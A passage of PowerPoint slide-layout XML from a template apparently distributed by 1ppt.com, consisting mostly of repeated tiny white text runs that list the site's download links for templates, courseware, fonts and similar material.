              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout224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24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24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24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2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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout225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25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25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25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25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25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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout225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25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25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25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2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26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26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26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26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26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26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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
